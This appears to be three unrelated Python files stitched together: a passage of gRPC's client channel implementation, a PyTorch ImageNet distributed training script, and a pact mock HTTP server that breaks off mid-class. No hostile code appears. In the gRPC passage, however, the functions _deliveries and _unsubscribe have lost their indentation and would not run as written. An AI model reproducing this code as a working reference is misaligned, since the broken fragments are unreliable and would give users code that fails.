                cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
                self._method, None, _determine_deadline(deadline), metadata,
                None if credentials is None else credentials._credentials,
                operationses, _event_handler(state,
                                             self._response_deserializer),
                self._context)
            return _MultiThreadedRendezvous(state, call,
                                            self._response_deserializer,
                                            deadline)
class _StreamUnaryMultiCallable(grpc.StreamUnaryMultiCallable):
    """Affords invoking a stream-unary RPC from client-side."""
    # pylint: disable=too-many-arguments
    def __init__(self, channel, managed_call, method, request_serializer,
                 response_deserializer):
        self._channel = channel
        self._managed_call = managed_call
        self._method = method
        self._request_serializer = request_serializer
        self._response_deserializer = response_deserializer
        self._context = cygrpc.build_census_context()
    def _blocking(self, request_iterator, timeout, metadata, credentials,
                  wait_for_ready, compression):
        """Runs the RPC synchronously: requests are consumed on a helper
        thread while this thread drains the segregated call's events."""
        deadline = _deadline(timeout)
        state = _RPCState(_STREAM_UNARY_INITIAL_DUE, None, None, None, None)
        initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
            wait_for_ready)
        augmented_metadata = _compression.augment_metadata(
            metadata, compression)
        call = self._channel.segregated_call(
            cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
            None, _determine_deadline(deadline), augmented_metadata,
            None if credentials is None else credentials._credentials,
            _stream_unary_invocation_operationses_and_tags(
                augmented_metadata, initial_metadata_flags), self._context)
        _consume_request_iterator(request_iterator, state, call,
                                  self._request_serializer, None)
        while True:
            event = call.next_event()
            with state.condition:
                _handle_event(event, state, self._response_deserializer)
                state.condition.notify_all()
                # All operation batches accounted for: the RPC is done.
                if not state.due:
                    break
        return state, call
    def __call__(self,
                 request_iterator,
                 timeout=None,
                 metadata=None,
                 credentials=None,
                 wait_for_ready=None,
                 compression=None):
        # Blocking invocation returning only the response message.
        state, call, = self._blocking(request_iterator, timeout, metadata,
                                      credentials, wait_for_ready, compression)
        return _end_unary_response_blocking(state, call, False, None)
    def with_call(self,
                  request_iterator,
                  timeout=None,
                  metadata=None,
                  credentials=None,
                  wait_for_ready=None,
                  compression=None):
        # Blocking invocation returning (response, grpc.Call).
        state, call, = self._blocking(request_iterator, timeout, metadata,
                                      credentials, wait_for_ready, compression)
        return _end_unary_response_blocking(state, call, True, None)
    def future(self,
               request_iterator,
               timeout=None,
               metadata=None,
               credentials=None,
               wait_for_ready=None,
               compression=None):
        # Asynchronous invocation mediated by the channel spin thread.
        deadline = _deadline(timeout)
        state = _RPCState(_STREAM_UNARY_INITIAL_DUE, None, None, None, None)
        event_handler = _event_handler(state, self._response_deserializer)
        initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
            wait_for_ready)
        augmented_metadata = _compression.augment_metadata(
            metadata, compression)
        call = self._managed_call(
            cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
            None, deadline, augmented_metadata,
            None if credentials is None else credentials._credentials,
            _stream_unary_invocation_operationses(metadata,
                                                  initial_metadata_flags),
            event_handler, self._context)
        _consume_request_iterator(request_iterator, state, call,
                                  self._request_serializer, event_handler)
        return _MultiThreadedRendezvous(state, call,
                                        self._response_deserializer, deadline)
class _StreamStreamMultiCallable(grpc.StreamStreamMultiCallable):
    """Affords invoking a stream-stream (bidirectional) RPC from client-side."""
    # pylint: disable=too-many-arguments
    def __init__(self, channel, managed_call, method, request_serializer,
                 response_deserializer):
        self._channel = channel
        self._managed_call = managed_call
        self._method = method
        self._request_serializer = request_serializer
        self._response_deserializer = response_deserializer
        self._context = cygrpc.build_census_context()
    def __call__(self,
                 request_iterator,
                 timeout=None,
                 metadata=None,
                 credentials=None,
                 wait_for_ready=None,
                 compression=None):
        deadline = _deadline(timeout)
        state = _RPCState(_STREAM_STREAM_INITIAL_DUE, None, None, None, None)
        initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
            wait_for_ready)
        augmented_metadata = _compression.augment_metadata(
            metadata, compression)
        # Messages are sent by the request-consumer thread and received
        # lazily via the rendezvous; only metadata/status batches start here.
        operationses = (
            (
                cygrpc.SendInitialMetadataOperation(augmented_metadata,
                                                    initial_metadata_flags),
                cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
            ),
            (cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
        )
        event_handler = _event_handler(state, self._response_deserializer)
        call = self._managed_call(
            cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
            None, _determine_deadline(deadline), augmented_metadata,
            None if credentials is None else credentials._credentials,
            operationses, event_handler, self._context)
        _consume_request_iterator(request_iterator, state, call,
                                  self._request_serializer, event_handler)
        return _MultiThreadedRendezvous(state, call,
                                        self._response_deserializer, deadline)
class _InitialMetadataFlags(int):
    """Stores immutable initial metadata flags"""
    def __new__(cls, value=_EMPTY_FLAGS):
        # Only the bits cygrpc actually defines are retained.
        masked_value = value & cygrpc.InitialMetadataFlags.used_mask
        return super(_InitialMetadataFlags, cls).__new__(cls, masked_value)
    def with_wait_for_ready(self, wait_for_ready):
        """Returns a copy with the wait-for-ready bits applied.

        A None argument means "unspecified" and leaves the flags unchanged;
        True/False set or clear the flag and mark it explicitly set.
        """
        if wait_for_ready is None:
            return self
        wait_flag = cygrpc.InitialMetadataFlags.wait_for_ready
        explicit_flag = cygrpc.InitialMetadataFlags.wait_for_ready_explicitly_set
        if wait_for_ready:
            return self.__class__(self | wait_flag | explicit_flag)
        return self.__class__(self & ~wait_flag | explicit_flag)
class _ChannelCallState(object):
    """Bookkeeping for managed calls on a channel (spin-thread lifetime)."""
    def __init__(self, channel):
        # Guards managed_calls and the spin-thread start decision.
        self.lock = threading.Lock()
        # The underlying cygrpc channel.
        self.channel = channel
        # Number of outstanding managed calls; the spin thread exits at 0.
        self.managed_calls = 0
        self.threading = False
    def reset_postfork_child(self):
        # After fork, the child has no spin thread and no live calls.
        self.managed_calls = 0
    def __del__(self):
        try:
            self.channel.close(cygrpc.StatusCode.cancelled,
                               'Channel deallocated!')
        except (TypeError, AttributeError):
            # Interpreter shutdown may have already torn down these names.
            pass
def _run_channel_spin_thread(state):
    """Starts the per-channel daemon thread that drains the completion queue.

    Each event's tag is the event handler for its call; the thread exits
    once the last managed call completes (state.managed_calls reaches 0).
    """
    def channel_spin():
        while True:
            cygrpc.block_if_fork_in_progress(state)
            event = state.channel.next_call_event()
            if event.completion_type == cygrpc.CompletionType.queue_timeout:
                continue
            call_completed = event.tag(event)
            if call_completed:
                with state.lock:
                    state.managed_calls -= 1
                    if state.managed_calls == 0:
                        return
    channel_spin_thread = cygrpc.ForkManagedThread(target=channel_spin)
    # Thread.setDaemon() is deprecated (DeprecationWarning since Python
    # 3.10); assign the `daemon` attribute instead.
    channel_spin_thread.daemon = True
    channel_spin_thread.start()
# Returns a `create` closure that opens integrated calls on state.channel
# and keeps the channel spin thread alive while calls are outstanding.
def _channel_managed_call_management(state):
    # pylint: disable=too-many-arguments
    def create(flags, method, host, deadline, metadata, credentials,
               operationses, event_handler, context):
        """Creates a cygrpc.IntegratedCall.
        Args:
          flags: An integer bitfield of call flags.
          method: The RPC method.
          host: A host string for the created call.
          deadline: A float to be the deadline of the created call or None if
            the call is to have an infinite deadline.
          metadata: The metadata for the call or None.
          credentials: A cygrpc.CallCredentials or None.
          operationses: An iterable of iterables of cygrpc.Operations to be
            started on the call.
          event_handler: A behavior to call to handle the events resultant from
            the operations on the call.
          context: Context object for distributed tracing.
        Returns:
          A cygrpc.IntegratedCall with which to conduct an RPC.
        """
        operationses_and_tags = tuple((
            operations,
            event_handler,
        ) for operations in operationses)
        with state.lock:
            call = state.channel.integrated_call(flags, method, host, deadline,
                                                 metadata, credentials,
                                                 operationses_and_tags, context)
            # First managed call: the spin thread must be (re)started.
            if state.managed_calls == 0:
                state.managed_calls = 1
                _run_channel_spin_thread(state)
            else:
                state.managed_calls += 1
            return call
    return create
class _ChannelConnectivityState(object):
    """Bookkeeping for connectivity-state polling and callback delivery."""
    def __init__(self, channel):
        # RLock: delivery and polling paths re-enter while holding it.
        self.lock = threading.RLock()
        self.channel = channel
        # True while the _poll_connectivity thread is running.
        self.polling = False
        # Last observed grpc.ChannelConnectivity, or None when not polling.
        self.connectivity = None
        self.try_to_connect = False
        # List of mutable [callback, last_delivered_connectivity] pairs.
        self.callbacks_and_connectivities = []
        # True while a _deliver thread is flushing callbacks.
        self.delivering = False
    def reset_postfork_child(self):
        # After fork the child has no polling/delivery threads or subscribers.
        self.polling = False
        self.connectivity = None
        self.try_to_connect = False
        self.callbacks_and_connectivities = []
        self.delivering = False
def _deliveries(state):
callbacks_needing_update = []
for callback_and_connectivity in state.callbacks_and_connectivities:
callback, callback_connectivity, = callback_and_connectivity
if callback_connectivity is not state.connectivity:
callbacks_needing_update.append(callback)
callback_and_connectivity[1] = state.connectivity
return callbacks_needing_update
def _deliver(state, initial_connectivity, initial_callbacks):
    """Delivery loop (run on its own thread): invokes each callback with the
    current connectivity, repeating until no stale callbacks remain."""
    connectivity = initial_connectivity
    callbacks = initial_callbacks
    while True:
        for callback in callbacks:
            cygrpc.block_if_fork_in_progress(state)
            try:
                callback(connectivity)
            except Exception: # pylint: disable=broad-except
                # User callbacks must not kill the delivery thread.
                _LOGGER.exception(
                    _CHANNEL_SUBSCRIPTION_CALLBACK_ERROR_LOG_MESSAGE)
        with state.lock:
            # Connectivity may have changed while callbacks ran; pick up
            # any newly-stale callbacks before exiting.
            callbacks = _deliveries(state)
            if callbacks:
                connectivity = state.connectivity
            else:
                state.delivering = False
                return
def _spawn_delivery(state, callbacks):
    """Starts a daemon thread delivering the current connectivity to
    `callbacks` and marks the state as delivering."""
    delivering_thread = cygrpc.ForkManagedThread(target=_deliver,
                                                 args=(
                                                     state,
                                                     state.connectivity,
                                                     callbacks,
                                                 ))
    # Thread.setDaemon() is deprecated (DeprecationWarning since Python
    # 3.10); assign the `daemon` attribute instead.
    delivering_thread.daemon = True
    delivering_thread.start()
    state.delivering = True
# NOTE(https://github.com/grpc/grpc/issues/3064): We'd rather not poll.
def _poll_connectivity(state, channel, initial_try_to_connect):
    """Polling loop (run on a daemon thread): watches channel connectivity
    and fans updates out to subscribed callbacks via _spawn_delivery.

    Exits when there are no subscribers and no pending connect request.
    """
    try_to_connect = initial_try_to_connect
    connectivity = channel.check_connectivity_state(try_to_connect)
    with state.lock:
        state.connectivity = (
            _common.
            CYGRPC_CONNECTIVITY_STATE_TO_CHANNEL_CONNECTIVITY[connectivity])
        callbacks = tuple(
            callback for callback, unused_but_known_to_be_none_connectivity in
            state.callbacks_and_connectivities)
        for callback_and_connectivity in state.callbacks_and_connectivities:
            callback_and_connectivity[1] = state.connectivity
        if callbacks:
            _spawn_delivery(state, callbacks)
    while True:
        # Wake at least every 200ms so unsubscription is noticed promptly.
        event = channel.watch_connectivity_state(connectivity,
                                                 time.time() + 0.2)
        cygrpc.block_if_fork_in_progress(state)
        with state.lock:
            if not state.callbacks_and_connectivities and not state.try_to_connect:
                # No subscribers and no pending connect request: stop polling.
                state.polling = False
                state.connectivity = None
                break
            try_to_connect = state.try_to_connect
            state.try_to_connect = False
        if event.success or try_to_connect:
            connectivity = channel.check_connectivity_state(try_to_connect)
            with state.lock:
                state.connectivity = (
                    _common.CYGRPC_CONNECTIVITY_STATE_TO_CHANNEL_CONNECTIVITY[
                        connectivity])
                if not state.delivering:
                    callbacks = _deliveries(state)
                    if callbacks:
                        _spawn_delivery(state, callbacks)
def _subscribe(state, callback, try_to_connect):
    """Registers `callback` for connectivity updates.

    Starts the polling thread on the first subscription; if a connectivity
    value is already known and no delivery is in flight, delivers it to the
    new callback immediately on a fresh delivery thread.
    """
    with state.lock:
        if not state.callbacks_and_connectivities and not state.polling:
            polling_thread = cygrpc.ForkManagedThread(
                target=_poll_connectivity,
                args=(state, state.channel, bool(try_to_connect)))
            # Thread.setDaemon() is deprecated (DeprecationWarning since
            # Python 3.10); assign the `daemon` attribute instead.
            polling_thread.daemon = True
            polling_thread.start()
            state.polling = True
            state.callbacks_and_connectivities.append([callback, None])
        elif not state.delivering and state.connectivity is not None:
            # A known connectivity exists: deliver it to this callback now.
            _spawn_delivery(state, (callback,))
            state.try_to_connect |= bool(try_to_connect)
            state.callbacks_and_connectivities.append(
                [callback, state.connectivity])
        else:
            state.try_to_connect |= bool(try_to_connect)
            state.callbacks_and_connectivities.append([callback, None])
def _unsubscribe(state, callback):
with state.lock:
for index, (subscribed_callback, unused_connectivity) in enumerate(
state.callbacks_and_connectivities):
if callback == subscribed_callback:
state.callbacks_and_connectivities.pop(index)
break
def _augment_options(base_options, compression):
    """Appends the compression option (if any) and the primary user-agent
    channel argument to the caller-supplied options."""
    user_agent_option = (
        (cygrpc.ChannelArgKey.primary_user_agent_string, _USER_AGENT),
    )
    return (tuple(base_options) +
            _compression.create_channel_option(compression) +
            user_agent_option)
def _separate_channel_options(options):
    """Separates core channel options from Python channel options."""
    _is_python_option = (
        lambda pair: pair[0] ==
        grpc.experimental.ChannelOptions.SingleThreadedUnaryStream)
    python_options = [pair for pair in options if _is_python_option(pair)]
    core_options = [pair for pair in options if not _is_python_option(pair)]
    return python_options, core_options
class Channel(grpc.Channel):
    """A cygrpc.Channel-backed implementation of grpc.Channel."""
    def __init__(self, target, options, credentials, compression):
        """Constructor.
        Args:
          target: The target to which to connect.
          options: Configuration options for the channel.
          credentials: A cygrpc.ChannelCredentials or None.
          compression: An optional value indicating the compression method to be
            used over the lifetime of the channel.
        """
        python_options, core_options = _separate_channel_options(options)
        self._single_threaded_unary_stream = _DEFAULT_SINGLE_THREADED_UNARY_STREAM
        self._process_python_options(python_options)
        self._channel = cygrpc.Channel(
            _common.encode(target), _augment_options(core_options, compression),
            credentials)
        self._call_state = _ChannelCallState(self._channel)
        self._connectivity_state = _ChannelConnectivityState(self._channel)
        # Registered so the fork handlers can close this channel pre-fork.
        cygrpc.fork_register_channel(self)
    def _process_python_options(self, python_options):
        """Sets channel attributes according to python-only channel options."""
        for pair in python_options:
            if pair[0] == grpc.experimental.ChannelOptions.SingleThreadedUnaryStream:
                self._single_threaded_unary_stream = True
    def subscribe(self, callback, try_to_connect=None):
        """See grpc.Channel.subscribe."""
        _subscribe(self._connectivity_state, callback, try_to_connect)
    def unsubscribe(self, callback):
        """See grpc.Channel.unsubscribe."""
        _unsubscribe(self._connectivity_state, callback)
    def unary_unary(self,
                    method,
                    request_serializer=None,
                    response_deserializer=None):
        """See grpc.Channel.unary_unary."""
        return _UnaryUnaryMultiCallable(
            self._channel, _channel_managed_call_management(self._call_state),
            _common.encode(method), request_serializer, response_deserializer)
    def unary_stream(self,
                     method,
                     request_serializer=None,
                     response_deserializer=None):
        """See grpc.Channel.unary_stream."""
        # NOTE(rbellevi): Benchmarks have shown that running a unary-stream RPC
        # on a single Python thread results in an appreciable speed-up. However,
        # due to slight differences in capability, the multi-threaded variant
        # remains the default.
        if self._single_threaded_unary_stream:
            return _SingleThreadedUnaryStreamMultiCallable(
                self._channel, _common.encode(method), request_serializer,
                response_deserializer)
        else:
            return _UnaryStreamMultiCallable(
                self._channel,
                _channel_managed_call_management(self._call_state),
                _common.encode(method), request_serializer,
                response_deserializer)
    def stream_unary(self,
                     method,
                     request_serializer=None,
                     response_deserializer=None):
        """See grpc.Channel.stream_unary."""
        return _StreamUnaryMultiCallable(
            self._channel, _channel_managed_call_management(self._call_state),
            _common.encode(method), request_serializer, response_deserializer)
    def stream_stream(self,
                      method,
                      request_serializer=None,
                      response_deserializer=None):
        """See grpc.Channel.stream_stream."""
        return _StreamStreamMultiCallable(
            self._channel, _channel_managed_call_management(self._call_state),
            _common.encode(method), request_serializer, response_deserializer)
    def _unsubscribe_all(self):
        # Drops every connectivity subscriber; the polling thread then
        # notices the empty list and stops.
        state = self._connectivity_state
        if state:
            with state.lock:
                del state.callbacks_and_connectivities[:]
    def _close(self):
        self._unsubscribe_all()
        self._channel.close(cygrpc.StatusCode.cancelled, 'Channel closed!')
        cygrpc.fork_unregister_channel(self)
    def _close_on_fork(self):
        # Variant of _close invoked by the fork handlers.
        self._unsubscribe_all()
        self._channel.close_on_fork(cygrpc.StatusCode.cancelled,
                                    'Channel closed due to fork')
    def __enter__(self):
        return self
    def __exit__(self, exc_type, exc_val, exc_tb):
        self._close()
        return False
    def close(self):
        """See grpc.Channel.close."""
        self._close()
    def __del__(self):
        # TODO(https://github.com/grpc/grpc/issues/12531): Several releases
        # after 1.12 (1.16 or thereabouts?) add a "self._channel.close" call
        # here (or more likely, call self._close() here). We don't do this today
        # because many valid use cases today allow the channel to be deleted
        # immediately after stubs are created. After a sufficient period of time
        # has passed for all users to be trusted to hang out to their channels
        # for as long as they are in use and to close them after using them,
        # then deletion of this grpc._channel.Channel instance can be made to
        # effect closure of the underlying cygrpc.Channel instance.
        try:
            self._unsubscribe_all()
        except: # pylint: disable=bare-except
            # Exceptions in __del__ are ignored by Python anyway, but they can
            # keep spamming logs. Just silence them.
            pass
|
train_single_label_dist_imagenet1k.py | # --------------------------------------------------------
# ImageNet-21K Pretraining for The Masses
# Copyright 2021 Alibaba MIIL (c)
# Licensed under MIT License [see LICENSE file for details]
# Written by Tal Ridnik
# --------------------------------------------------------
import argparse
import time
import torch
import torch.nn.parallel
import torch.optim
import torch.utils.data.distributed
from torch.optim import lr_scheduler
import torch.multiprocessing as mp
from src_files.data_loading.data_loader import create_data_loaders
from src_files.helper_functions.distributed import print_at_master, setup_distrib, reduce_tensor, num_distrib, is_master
from src_files.helper_functions.general_helper_functions import accuracy, silence_PIL_warnings
from src_files.models import create_model
from src_files.loss_functions.losses import CrossEntropyLS
from torch.cuda.amp import GradScaler, autocast
from src_files.optimizers.create_optimizer import create_optimizer
# Command-line interface for single-label ImageNet-1K distributed training.
parser = argparse.ArgumentParser(description='PyTorch ImageNet21K Single-label Training')
parser.add_argument('--data_path', type=str)
parser.add_argument('--lr', default=5e-5, type=float)
parser.add_argument('--model_name', default='tresnet_m')
parser.add_argument('--model_path', default='./tresnet_m.pth', type=str)
parser.add_argument('--num_workers', default=8, type=int)
parser.add_argument('--image_size', default=224, type=int)
parser.add_argument('--num_classes', default=1000, type=int)
parser.add_argument('--batch_size', default=64, type=int)
parser.add_argument('--epochs', default=80, type=int)
parser.add_argument('--weight_decay', default=1e-4, type=float)
parser.add_argument("--label_smooth", default=0.2, type=float)
parser.add_argument("--cfg", default="", type=str)
# Flags below follow the standard PyTorch distributed example conventions.
parser.add_argument('--world-size', default=-1, type=int,
                    help='number of nodes for distributed training')
parser.add_argument('--rank', default=-1, type=int,
                    help='node rank for distributed training')
parser.add_argument('--dist-url', default='tcp://224.66.41.62:23456', type=str,
                    help='url used to set up distributed training')
parser.add_argument('--dist-backend', default='nccl', type=str,
                    help='distributed backend')
parser.add_argument('--seed', default=None, type=int,
                    help='seed for initializing training. ')
parser.add_argument('--gpu', default=None, type=int,
                    help='GPU id to use.')
parser.add_argument('--multiprocessing-distributed', action='store_true',
                    help='Use multi-processing distributed training to launch '
                    'N processes per node, which has N GPUs. This is the '
                    'fastest way to use PyTorch for either single node or '
                    'multi node data parallel training')
# Best top-1 accuracy seen so far; mutated via `global` in train_21k.
best_acc1 = 0
def main():
    """Entry point: parse CLI arguments and launch training.

    With --multiprocessing-distributed, spawns one worker process per local
    GPU via torch.multiprocessing; otherwise runs main_worker inline on
    the GPU given by --gpu.
    """
    args = parser.parse_args()
    args.distributed = args.world_size > 1 or args.multiprocessing_distributed
    ngpus_per_node = torch.cuda.device_count()
    if args.multiprocessing_distributed:
        # Since we have ngpus_per_node processes per node, the total
        # world_size needs to be adjusted accordingly.
        args.world_size = ngpus_per_node * args.world_size
        # mp.spawn supplies the process index (used as the local GPU id) as
        # main_worker's first argument, followed by the tuple in `args=`.
        mp.spawn(main_worker, nprocs=ngpus_per_node, args=(ngpus_per_node, args))
    else:
        # BUG FIX: this branch previously called main_worker(cfg.gpu, ..., cfg)
        # where `cfg` is undefined (NameError); the parsed namespace is `args`.
        main_worker(args.gpu, ngpus_per_node, args)
def main_worker(gpu ,ngpu_per_node, args):
    """Per-process training entry point: bind this process to one GPU and train.

    Invoked once per GPU by mp.spawn (distributed) or directly (single GPU).
    `gpu` is the local GPU index / spawn rank on this node.
    """
    torch.cuda.set_device(gpu)
    args.local_rank = gpu
    # Global rank = node rank * GPUs-per-node + local GPU index.
    args.rank = args.rank * ngpu_per_node + args.local_rank
    # arguments
    # args = parser.parse_args()
    # EXIF warning silent
    silence_PIL_warnings()
    # Setup model (project helper) and move it onto this process's GPU.
    model = create_model(args).cuda(gpu)
    # create optimizer
    optimizer = create_optimizer(model, args)
    # setup distributed — presumably wraps the model for DDP; confirm in setup_distrib.
    model = setup_distrib(model, args)
    # Data loading
    train_loader, val_loader = create_data_loaders(args)
    # Actuall Training
    train_21k(model, train_loader, val_loader, optimizer, args)
def train_21k(model, train_loader, val_loader, optimizer, args):
    """Train `model` for args.epochs epochs with mixed precision and OneCycleLR.

    Validates after every epoch and, on the master process, saves a checkpoint,
    tracking the best top-1 accuracy in the module-level `best_acc1`.
    """
    global best_acc1
    batch_time = AverageMeter('Time', ':6.3f')
    data_time = AverageMeter('Data', ':6.3f')
    losses = AverageMeter('Loss', ':.4e')
    top1 = AverageMeter('Acc@1', ':6.2f')
    top5 = AverageMeter('Acc@5', ':6.2f')
    # Label-smoothed cross-entropy (project helper).
    loss_fn = CrossEntropyLS(args.label_smooth)
    # One LR cycle over the whole run; stepped once per batch below.
    scheduler = lr_scheduler.OneCycleLR(optimizer, max_lr=args.lr, steps_per_epoch=len(train_loader),
                                        epochs=args.epochs, pct_start=0.1, cycle_momentum=False, div_factor=500)
    # Gradient scaler for fp16 mixed-precision training.
    scaler = GradScaler()
    # training loop
    for epoch in range(args.epochs):
        progress = ProgressMeter(
            len(train_loader),
            [batch_time, data_time, losses, top1, top5],
            prefix="Epoch: [{}]".format(epoch))
        if args.distributed:
            # Reshuffle the distributed sampler so each epoch sees a new order.
            train_loader.sampler.set_epoch(epoch)
        epoch_start_time = time.time()
        end = time.time()
        for i, (images, target) in enumerate(train_loader):
            data_time.update(time.time() - end)
            with autocast():  # mixed precision
                output = model(images)
                loss = loss_fn(output, target)  # note - loss also in fp16
            losses.update(loss.item(), images.size(0))
            model.zero_grad()
            scaler.scale(loss).backward()
            scaler.step(optimizer)
            scaler.update()
            # BUG FIX: the scheduler was previously stepped *before*
            # backward()/optimizer step, which skews the per-batch LR schedule
            # and triggers a PyTorch "scheduler before optimizer" warning;
            # per-batch schedulers must step after the optimizer update.
            scheduler.step()
            acc1, acc5 = accuracy(output.float(), target, topk=(1, 5))
            top1.update(acc1.item(), images.size(0))
            top5.update(acc5.item(), images.size(0))
            batch_time.update(time.time() - end)
            end = time.time()
            if i % 20 == 0:
                progress.display(i)
        epoch_time = time.time() - epoch_start_time
        print_at_master(
            "\nFinished Epoch, Training Rate: {:.1f} [img/sec]".format(len(train_loader) *
                                                                       args.batch_size / epoch_time * max(num_distrib(),
                                                                                                          1)))
        # validation epoch
        acc1 = validate_21k(val_loader, model, args, epoch)
        if is_master():
            # Only the master process writes checkpoints.
            is_best = acc1 > best_acc1
            best_acc1 = max(acc1, best_acc1)
            save_checkpoint({
                'epoch': epoch + 1,
                'state_dict': model.state_dict(),
                'best_acc1': best_acc1,
                'optimizer' : optimizer.state_dict(),
            }, is_best)
def validate_21k(val_loader, model, args, epoch):
    """Evaluate `model` on `val_loader` and return the average top-1 accuracy.

    Temporarily switches the model to eval mode; restores train mode on exit.
    Accuracies are all-reduced across workers when running distributed.
    """
    print_at_master("starting validation")
    model.eval()
    top1 = AverageMeter('Acc@1', ':6.2f')
    top5 = AverageMeter('Acc@5', ':6.2f')
    progress = ProgressMeter(
        len(val_loader),
        [top1, top5],
        prefix="Epoch: [{}]".format(epoch))
    with torch.no_grad():
        for step, (images, target) in enumerate(val_loader):
            # Forward pass under autocast (mixed precision), upcast for metrics.
            with autocast():
                logits = model(images).float()
            acc1, acc5 = accuracy(logits, target, topk=(1, 5))
            if args.distributed:
                # Average the per-worker accuracies across the process group.
                acc1 = reduce_tensor(acc1, args.world_size)
                acc5 = reduce_tensor(acc5, args.world_size)
                torch.cuda.synchronize()
            top1.update(acc1.item(), images.size(0))
            top5.update(acc5.item(), images.size(0))
            if step % 20 == 0:
                progress.display(step)
    print_at_master("Validation results:")
    print_at_master('Acc_Top1 [%] {:.2f}, Acc_Top5 [%] {:.2f} '.format(top1.avg, top5.avg))
    model.train()
    return top1.avg
class AverageMeter(object):
    """Tracks the latest value and running average of a streaming metric."""

    def __init__(self, name, fmt=':f'):
        # `name` labels the metric; `fmt` is the format spec used by __str__.
        self.name = name
        self.fmt = fmt
        self.reset()

    def reset(self):
        """Clear all accumulated statistics."""
        self.val = 0
        self.avg = 0
        self.sum = 0
        self.count = 0

    def update(self, val, n=1):
        """Record `val` observed `n` times and refresh the running mean."""
        self.val = val
        self.count += n
        self.sum += val * n
        self.avg = self.sum / self.count

    def __str__(self):
        # e.g. "Loss 0.1234 (0.5678)" — latest value followed by the average.
        template = '{name} {val%s} ({avg%s})' % (self.fmt, self.fmt)
        return template.format(**self.__dict__)
class ProgressMeter(object):
    """Formats and prints a one-line progress summary for a set of meters."""

    def __init__(self, num_batches, meters, prefix=""):
        # Pre-build "[ cur/total]" format string once, sized to `num_batches`.
        self.batch_fmtstr = self._get_batch_fmtstr(num_batches)
        self.meters = meters
        self.prefix = prefix

    def display(self, batch):
        """Print prefix, batch counter, and every meter, tab-separated."""
        pieces = [self.prefix + self.batch_fmtstr.format(batch)]
        pieces.extend(str(m) for m in self.meters)
        print_at_master('\t'.join(pieces))

    def _get_batch_fmtstr(self, num_batches):
        # Right-align the current batch number to the width of the total.
        width = len(str(num_batches))
        cell = '{:%dd}' % width
        return '[' + cell + '/' + cell.format(num_batches) + ']'
def save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):
    """Serialize `state` to `filename`; mirror it to 'model_best.pth.tar' when best."""
    torch.save(state, filename)
    if not is_best:
        return
    import shutil
    shutil.copyfile(filename, 'model_best.pth.tar')
# Script entry point: run the training driver only when executed directly.
if __name__ == '__main__':
    main()
|
mock_server.py | import logging
import queue
import traceback
from http.server import BaseHTTPRequestHandler, HTTPServer
from multiprocessing import Process, Queue
from .pact_request_handler import PactRequestHandler
_providers = {}
log = logging.getLogger(__name__)
def getMockServer(pact):
    """Return the mock server for this pact's provider, creating it on first use.

    One Server (and its child process) is kept per provider name for the
    lifetime of the interpreter.
    """
    name = pact.provider.name
    if name not in _providers:
        _providers[name] = Server(pact)
    return _providers[name]
class Server:
    """Drives a mock HTTP server in a child process and collects its results.

    The two Queues are the only channel between this process and the server:
    `interactions` feeds expected requests in; `results` carries outcomes back.
    """

    def __init__(self, pact):
        self.pact = pact
        self.interactions = Queue()
        self.results = Queue()
        self.process = Process(target=run_server, args=(pact, self.interactions, self.results))
        self.process.start()

    def setup(self, interactions):
        """Queue the expected interactions for the server process to consume."""
        for item in interactions:
            self.interactions.put_nowait(item)

    def verify(self):
        """Drain results; raise on the first error or pact-mismatch reported."""
        while not self.results.empty():
            outcome = self.results.get()
            status = outcome["status"]
            if status == "error":
                raise MockServer.Error(outcome["reason"])
            if status == "failed":
                raise AssertionError(outcome["reason"])

    def terminate(self):
        """Stop the child server process."""
        self.process.terminate()
def run_server(pact, interactions, results):
    """Child-process entry point: serve mock HTTP requests until terminated."""
    MockServer(pact, interactions, results).serve_forever()
class MockServer(HTTPServer):
    """HTTPServer that replays pact interactions and reports outcomes via queues."""

    def __init__(self, pact, interactions, results):
        self.pact = pact
        self.incoming_interactions = interactions
        self.outgoing_results = results
        super().__init__(("", pact.port), MockHTTPRequestHandler)
        self.interactions = []
        # Per-provider log file, isolated from the root logger (no propagation).
        self.log = logging.getLogger(__name__ + "." + pact.provider.name)
        self.log.addHandler(logging.FileHandler(f"{pact.log_dir}/{pact.provider.name}.log"))
        self.log.setLevel(logging.DEBUG)
        self.log.propagate = False

    class Error(Exception):
        """Raised for internal (non-assertion) mock-server failures."""
        pass
class MockHTTPRequestHandler(BaseHTTPRequestHandler, PactRequestHandler):
    """Validates each incoming request against the next registered pact
    interaction and reports success/failure on the server's results queue."""
    def __init__(self, request, client_address, server):
        # Pre-seed response state; run_request() fills these in before replying.
        self.response_status_code = None
        self.response_headers = {}
        self.response_body = None
        PactRequestHandler.__init__(self, server.pact)
        # Must run last: BaseHTTPRequestHandler.__init__ handles the request
        # synchronously during construction, dispatching to do_<METHOD>().
        BaseHTTPRequestHandler.__init__(self, request, client_address, server)
    def error_result(self, message, content="", status="error", status_code=500):
        # Record the failure on the results queue and stage a plain-text reply.
        self.server.outgoing_results.put({"status": status, "reason": message})
        self.response_status_code = status_code
        self.response_headers = {"Content-Type": "text/plain; charset=utf-8"}
        self.response_body = (content or message).encode("utf8")
    def run_request(self, method):
        # Read the body (when Content-Length is present), validate against the
        # pact, then emit whatever response state validation produced.
        try:
            self.body = None
            for header in self.headers:
                if header.lower() == "content-length":
                    self.body = self.rfile.read(int(self.headers[header]))
            self.validate_request(method)
        except AssertionError as e:
            # Pact mismatch: reported via error_result with default 500 here;
            # handle_failure() is the 418 path used by the validator itself.
            self.error_result(str(e))
        except Exception as e:
            self.error_result(f"Internal Error: {e}", traceback.format_exc())
        self.send_response(self.response_status_code)
        for header in self.response_headers:
            self.send_header(header, self.response_headers[header])
        self.end_headers()
        if self.response_body:
            self.wfile.write(self.response_body)
    def get_interaction(self, path):
        # Pop the next expected interaction; a request with none registered is
        # a test failure, not a server error.
        try:
            interaction = self.server.incoming_interactions.get(False)
        except queue.Empty:
            raise AssertionError(
                f"Request at {path} received but no interaction registered"
            ) from None
        return interaction
    def handle_success(self, interaction):
